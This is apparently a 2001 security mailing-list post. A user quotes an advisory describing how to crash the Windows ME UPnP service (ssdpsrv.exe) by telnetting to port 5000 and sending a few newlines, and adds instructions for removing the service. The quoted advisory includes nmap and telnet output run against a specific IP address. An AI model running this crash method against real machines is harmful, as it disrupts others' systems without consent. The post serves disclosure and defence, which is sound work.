This is a cross post out of general interest to security basics.

Firstly, you have to wonder why someone is running this service. I personally only found out after using a ports traffic analyzer. I will pass the URL for the program on if you want it, but I do not want to be seen to plug it if that is against the rules of the forum. :-)
Secondly, Windows Millennium installs the service without telling you that it has done so when you do a basic install. Remove it using Control Panel, Add/Remove Programs, Windows Setup, Communications, click on Universal plug and pray (sic), and then apply.

At 19:46 17/10/2001 -0500, you wrote:

>By connecting to a computer running Ssdpsrv you are able to crash the
>Ssdpsrv server.
>
>Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
>This service comes standard with the WindowsME installation.
>
>The Ssdpsrv.exe server is started at boot.
>Here is the registry entry:
>  KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
>Here is the file that starts the server:
>  c:\windows\system\ssdpsrv.exe
>
>For information about UPnP go here:
>  http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
>Upon running a scan on a computer running the server I get the following:
><snip>
>  bash-2.05$ nmap -sT 165.121.234.217
>  Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
>  Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
>  (The 1547 ports scanned but not shown below are in state: closed)
>  Port       State       Service
>  139/tcp    open        netbios-ssn
>  5000/tcp   open        fics
>  Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
></snap>
>
>Method to crash Ssdpsrv:
>  Connect to the computer on port 5000.
>  Send 3 to 5 newline characters.
>  You then get an error and are disconnected.
><snip>
>  bash-2.05$ telnet 165.121.234.217 5000
>  Trying 165.121.234.217...
>  Connected to 165.121.234.217.
>  Escape character is '^]'.
>
>
>
>  HTTP/1.1 400 Bad Request
>
>  Connection closed by foreign host.
>  bash-2.05$
></snap>
>
>Here is the error caused by the crash:
>  Ssdpsrv has caused an error in MSVCRT.DLL.
>  Ssdpsrv will now close.
>  If you continue to experience problems,
>  try restarting your computer.
>
>This causes the server to crash and closes port 5000.
>Either you must restart the server by manually running ssdpsrv.exe
>or reboot.
>
>shouts to pulltheplug #c.
>:o

All the best
Alan

Alan J Wright B.Sc(Hons)(Open)
SMS +47624462772.
Email [EMAIL PROTECTED] [EMAIL PROTECTED]

'You're a feisty little one but you'll soon learn respect'
Return of the Jedi
